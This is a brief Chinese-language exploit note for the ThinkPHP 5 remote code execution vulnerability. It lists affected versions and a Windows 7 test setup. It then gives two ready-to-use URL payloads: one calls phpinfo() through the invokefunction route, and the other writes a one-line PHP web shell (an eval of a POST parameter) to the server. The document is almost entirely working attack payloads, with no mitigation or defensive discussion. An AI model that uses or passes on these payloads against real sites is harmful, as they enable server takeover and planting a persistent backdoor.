ThinkPHP 5 RCE漏洞

影响范围
5.x < 5.1.31
5.x < 5.0.23

win7+thinkphp5.0.21
1、执行phpinfo()
public/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

image.png

2、写一句话木马
/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=<?php @eval($_POST[x]);?>

image.png